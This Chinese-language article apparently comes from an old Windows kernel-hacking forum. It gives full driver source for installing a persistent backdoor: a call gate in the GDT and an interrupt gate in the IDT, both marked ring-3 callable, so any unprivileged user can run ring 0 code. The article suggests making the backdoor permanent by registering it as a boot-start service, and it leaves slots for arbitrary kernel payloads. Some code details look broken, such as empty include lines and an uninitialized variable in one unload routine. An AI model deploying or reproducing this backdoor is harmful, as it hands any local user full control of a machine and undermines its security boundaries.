隐形人魔:任意用户模式下执行 ring 0 代码

众所周知在非 Admin 用户模式下，是不允许加载驱动执行 RING 0 代码的。
本文提供了一种方法，通过修改系统 GDT，IDT 来添加自己的 CALLGATE 和
INTGATE 这样便在系统中设置了一个后门。我们就可以利用这个后门
在任意用户模式下执行 ring 0 代码了。为了保证我们添加的 CALLGATE 和 INT
GATE 永久性。可以在第一次安装时利用 SERVICE API 或 INF 文件设置成随
系统启动。不过此方法也有个缺陷，就是在第一次安装 CALLGATE 或 INTGATE
时仍然需要 ADMIN 权限。下面分别给出了添加 CALLGATE 与 INTGATE 的具体
代码。

一、通过添加调用门实现

为了可以让任意用户来调用我们的 CALLGATE 需要解决一个小问题。因为
需要知道 CALLGATE 的 SELECTOR 后才可以调用。而在 RING 3 下除了能
得到 GDT 的 BASE ADDRESS 和 LIMIT 外是无法访问 GDT 内容的。我本想
在 RING 0 把 SELECTOR 保存到文件里。在 RING 3 下读取出来再调用。
后经过跟 wowocock 探讨。他提出的思路是在 RING 0 下通过
ZwQuerySystemInformation 得到 NTDLL.DLL 的 MODULE BASE 然后根据
PE HEADER 中的空闲处存放 SELECTOR。这样在 RING 3 的任意用户模式下
就很容易得到了。在这里要特别感谢 wowocock。下面的代码为了演示
方便，用了在我机器上 GDT 中第一个空闲描述符的 SELECTOR 。

驱动程序：

1. /*****************************************************************
2. 文件名 : WssAddCallGate.c
3. 描述 : 添加调用门
4. 作者 : sinister
5. *****************************************************************/
7. #include "ntddk.h"
8. #include "string.h"
10. #ifndef DWORD
11. #define DWORD unsigned int
12. #endif
14. #ifndef WORD
15. #define WORD unsigned short
16. #endif
18. #define LOWORD(l) ((unsigned short)(unsigned int)(l))
19. #define HIWORD(l) ((unsigned short)((((unsigned int)(l)) >> 16) & 0xFFFF))
22. typedef unsigned long ULONG;
23. static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
24. VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject);
26. #pragma pack(push,1)
29. typedef struct tagGDTR{
30. WORD wLimit;
31. DWORD *dwBase;
32. }GDTR, *PGDTR;
34. typedef struct tagGDT_DESCRIPTOR{
35. unsigned limit : 16;
36. unsigned baselo : 16;
37. unsigned basemid : 8;
38. unsigned type : 4;
39. unsigned system : 1;
40. unsigned dpl : 2;
41. unsigned present : 1;
42. unsigned limithi : 4;
43. unsigned available : 1;
44. unsigned zero : 1;
45. unsigned size : 1;
46. unsigned granularity : 1;
47. unsigned basehi : 8;
48. }GDT_DESCRIPTOR, *PGDT_DESCRIPTOR;
50. typedef struct tagCALLGATE_DESCRIPTOR{
51. unsigned short offset_0_15;
52. unsigned short selector;
53. unsigned char param_count : 4;
54. unsigned char some_bits : 4;
55. unsigned char type : 4;
56. unsigned char app_system : 1;
57. unsigned char dpl : 2;
58. unsigned char present : 1;
59. unsigned short offset_16_31;
60. } CALLGATE_DESCRIPTOR, *PCALLGATE_DESCRIPTOR;
62. #pragma pack(pop)
64. void __declspec(naked) Ring0Call()
65. {
66. PHYSICAL_ADDRESS PhyAdd;
68. __asm {
69. pushad
70. pushfd
71. cli
72. }
74. DbgPrint("WSS - My CallGate /n");
76. //
77. // 这里可以添加你想要执行的 ring 0 代码。
78. //
80. __asm {
81. popfd
82. popad
83. retf
84. }
85. }
87. VOID AddCallGate( ULONG FuncAddr )
88. {
89. GDTR gdtr;
90. PGDT_DESCRIPTOR gdt;
91. PCALLGATE_DESCRIPTOR callgate;
92. WORD wGDTIndex = 1;
95. __asm {
96. sgdt gdtr // 得到 GDT 基地址与界限
97. }
99. gdt = (PGDT_DESCRIPTOR) ( gdtr.dwBase + 8 ); // 跳过空选择子
101. while ( wGDTIndex < ( gdtr.wLimit / 8 ) )
102. {
103. if ( gdt->present == 0 ) //从 GDT 中找到空描述符
104. {
105. callgate = (PCALLGATE_DESCRIPTOR)gdt;
107. callgate->offset_0_15 = LOWORD(FuncAddr);
108. callgate->selector = 8; // 内核段选择子
109. callgate->param_count = 0; // 参数复制数量
110. callgate->some_bits = 0;
111. callgate->type = 0xC; // 386调用门
112. callgate->app_system = 0; // 系统描述符
113. callgate->dpl = 3; // RING 3 可调用
114. callgate->present = 1; // 设置存在位
115. callgate->offset_16_31 = HIWORD(FuncAddr);
116. DbgPrint("Add CallGate/n");
118. return;
119. }
121. gdt ++;
122. wGDTIndex ++;
123. }
125. }
128. // 驱动入口
129. NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
130. {
132. UNICODE_STRING nameString, linkString;
133. PDEVICE_OBJECT deviceObject;
134. NTSTATUS status;
135. HANDLE hHandle;
136. int i;
139. //卸载驱动
140. DriverObject->DriverUnload = DriverUnload;
142. //建立设备
143. RtlInitUnicodeString( &nameString, L"//Device//WssAddCallGate" );
145. status = IoCreateDevice( DriverObject,
146. 0,
147. &nameString,
148. FILE_DEVICE_UNKNOWN,
149. 0,
150. TRUE,
151. &deviceObject
152. );
155. if (!NT_SUCCESS( status ))
156. return status;
159. RtlInitUnicodeString( &linkString, L"//DosDevices//WssAddCallGate" );
161. status = IoCreateSymbolicLink (&linkString, &nameString);
163. if (!NT_SUCCESS( status ))
164. {
165. IoDeleteDevice (DriverObject->DeviceObject);
166. return status;
167. }
169. AddCallGate((ULONG)Ring0Call);
171. for ( i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) {
173. DriverObject->MajorFunction[i] = MydrvDispatch;
174. }
176. DriverObject->DriverUnload = DriverUnload;
178. return STATUS_SUCCESS;
179. }
182. //处理设备对象操作
184. static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
185. {
186. Irp->IoStatus.Status = STATUS_SUCCESS;
187. Irp->IoStatus.Information = 0L;
188. IoCompleteRequest( Irp, 0 );
189. return Irp->IoStatus.Status;
191. }
195. VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject)
196. {
197. UNICODE_STRING nameString;
199. RtlInitUnicodeString( &nameString, L"//DosDevices//WssAddCallGate" );
200. IoDeleteSymbolicLink(&nameString);
201. IoDeleteDevice(pDriverObject->DeviceObject);
203. return;
204. }
207. 应用程序：
209. #include
210. #include
212. void main()
213. {
214. WORD farcall[3];
216. farcall[0] = 0x0;
217. farcall[1] = 0x0;
218. farcall[2] = 0x4b; //在我机器上，添加 CALLGATE 的选择子为 4BH
220. _asm call fword ptr [farcall]
223. }

二、通过添加中断门实现

添加中断门没有什么需要解决的问题。直接在 RING 3 利用 int x
即可切换。想想系统调用 INT 2E 就很容易理解了。

1. /*****************************************************************
2. 文件名 : WssMyInt.c
3. 描述 : 添加中断门
4. 作者 : sinister
5. *****************************************************************/
7. #include "ntddk.h"
9. #pragma pack(1)
12. typedef struct tagIDTR {
13. short Limit;
14. unsigned int Base;
15. }IDTR, *PIDTR;
18. typedef struct tagIDTENTRY {
19. unsigned short OffsetLow;
20. unsigned short Selector;
21. unsigned char Reserved;
22. unsigned char Type:4;
23. unsigned char Always0:1;
24. unsigned char Dpl:2;
25. unsigned char Present:1;
26. unsigned short OffsetHigh;
27. } IDTENTRY, *PIDTENTRY;
29. #pragma pack()
31. #define MYINT 0x76
33. extern VOID _cdecl MyIntFunc();
34. CHAR IDTBuffer[6];
36. IDTENTRY OldIdt;
37. PIDTR idtr = (PIDTR)IDTBuffer;
40. static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
41. VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject);
43. // 我们得中断处理函数
45. VOID _cdecl MyIntFunc()
46. {
47. PHYSICAL_ADDRESS PhyAdd;
48. unsigned int dwCallNum;
49. unsigned int dwVAddr;
51. _asm mov dwCallNum,eax
53. //
54. // 这里可以添加你想要执行的 ring 0 代码
55. //
57. switch ( dwCallNum )
58. {
59. case 0x01:
60. DbgPrint("MyIntGate eax = 0x01/n");
61. break;
63. case 0x02:
64. DbgPrint("MyIntGate eax = 0x02/n");
65. break;
67. default:break;
69. }
72. _asm iretd; //中断返回
73. }
75. NTSTATUS AddMyInt()
76. {
77. PIDTENTRY Idt;
79. //得到 IDTR 中得段界限与基地址
80. _asm sidt IDTBuffer
82. Idt = (PIDTENTRY)idtr->Base; //得到IDT表基地址
84. //保存原有得 IDT
85. RtlCopyMemory(&OldIdt, &Idt[MYINT], sizeof(OldIdt));
88. //禁止中断
89. _asm cli
91. //设置 IDT 表各项添加我们得中断
93. Idt[MYINT].OffsetLow = (unsigned short)MyIntFunc; //取中断处理函数低16位
94. Idt[MYINT].Selector = 8; //设置内核段选择子
95. Idt[MYINT].Reserved = 0; //系统保留
96. Idt[MYINT].Type = 0xE; //设置0xE表示是中断门
97. Idt[MYINT].Always0 = 0; //系统保留必须为0
98. Idt[MYINT].Dpl = 3; //描述符权限，设置为允许 RING 3 进程调用
99. Idt[MYINT].Present = 1; //存在位设置为1表示有效
100. Idt[MYINT].OffsetHigh = (unsigned short)((unsigned int)MyIntFunc>>16); //取中断处理函数高16位
102. //开中断
103. _asm sti
105. return STATUS_SUCCESS;
106. }
109. //删除中断
111. void RemoveMyInt()
112. {
113. PIDTENTRY Idt;
114. Idt = (PIDTENTRY)idtr->Base;
116. _asm cli
117. //恢复 IDT
118. RtlCopyMemory(&Idt[MYINT], &OldIdt, sizeof(OldIdt));
119. _asm sti
120. }
124. // 驱动入口
125. NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath )
126. {
128. UNICODE_STRING nameString, linkString;
129. //UNICODE_STRING deviceString;
130. PDEVICE_OBJECT deviceObject;
131. NTSTATUS status;
132. WCHAR wBuffer[200];
134. nameString.Buffer = wBuffer;
135. nameString.MaximumLength = 200;
138. //卸载驱动
139. DriverObject->DriverUnload = DriverUnload;
141. //建立设备
142. RtlInitUnicodeString( &nameString, L"//Device//WSSINT" );
144. status = IoCreateDevice( DriverObject,
145. 0,
146. &nameString,
147. FILE_DEVICE_UNKNOWN,
148. 0,
149. TRUE,
150. &deviceObject
151. );
154. if (!NT_SUCCESS( status ))
155. return status;
157. RtlInitUnicodeString( &linkString, L"//??//WSSINT" );
159. //使WIN32应用程序可见
160. status = IoCreateSymbolicLink (&linkString, &nameString);
162. if (!NT_SUCCESS( status ))
163. {
164. IoDeleteDevice (DriverObject->DeviceObject);
165. return status;
166. }
168. AddMyInt();
170. DriverObject->MajorFunction[IRP_MJ_CREATE] = MydrvDispatch;
171. DriverObject->MajorFunction[IRP_MJ_CLOSE] = MydrvDispatch;
173. return STATUS_SUCCESS;
174. }
177. static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
178. {
179. NTSTATUS status;
181. UNREFERENCED_PARAMETER( DeviceObject );
183. Irp->IoStatus.Status = STATUS_SUCCESS;
184. Irp->IoStatus.Information = 0L;
185. status = STATUS_SUCCESS;
187. IoCompleteRequest( Irp, 0 );
188. return status;
190. }
194. VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject)
195. {
196. UNICODE_STRING nameString;
197. UNICODE_STRING deviceString,driveString;
198. NTSTATUS ntStatus;
200. RemoveMyInt();
202. //删除WIN32可见
203. IoDeleteSymbolicLink(&nameString);
204. //删除设备
205. IoDeleteDevice(pDriverObject->DeviceObject);
207. return;
208. }